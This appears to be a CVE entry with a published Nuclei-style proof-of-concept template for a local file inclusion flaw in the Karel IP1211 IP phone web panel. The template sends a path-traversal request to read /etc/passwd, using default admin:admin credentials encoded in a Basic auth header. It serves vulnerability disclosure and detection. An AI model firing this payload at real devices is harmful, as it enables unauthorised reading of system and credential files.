漏洞描述
Karel IP Phone IP1211 Web Management Panel is vulnerable to local file inclusion and can allow remote attackers to access arbitrary files stored on the remote device via the 'cgiServer.exx' endpoint and the 'page' parameter.
CVE-2025-34023: Karel IP Phone IP1211 Web Management Panel - Local File Inclusion
PoC代码[已公开]
id: CVE-2025-34023
info:
name: Karel IP Phone IP1211 Web Management Panel - Local File Inclusion
author: 0x_Akoko
severity: high
description: Karel IP Phone IP1211 Web Management Panel is vulnerable to local file inclusion and can allow remote attackers to access arbitrary files stored on the remote device via the 'cgiServer.exx' endpoint and the 'page' parameter.
reference:
- https://cxsecurity.com/issue/WLB-2020100038
- https://www.karel.com.tr/urun-cozum/ip1211-ip-telefon
- https://nvd.nist.gov/vuln/detail/CVE-2025-34023
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2025-34023
epss-score: 0.01584
epss-percentile: 0.81013
cwe-id: CWE-22
metadata:
max-request: 1
tags: cve,cve2025,karel,lfi,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd"
headers:
Authorization: Basic YWRtaW46YWRtaW4=
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# digest: 4b0a00483046022100d3ead89da8ef76c36c4d7619c02967f2ecfa20465d5cd6150119358388d567ba02210091b3ba3caf485c801bf2bf1de928f543263ec91435affbc61d87de54593f36e2:922c64590222798bb761d5b6d8e72950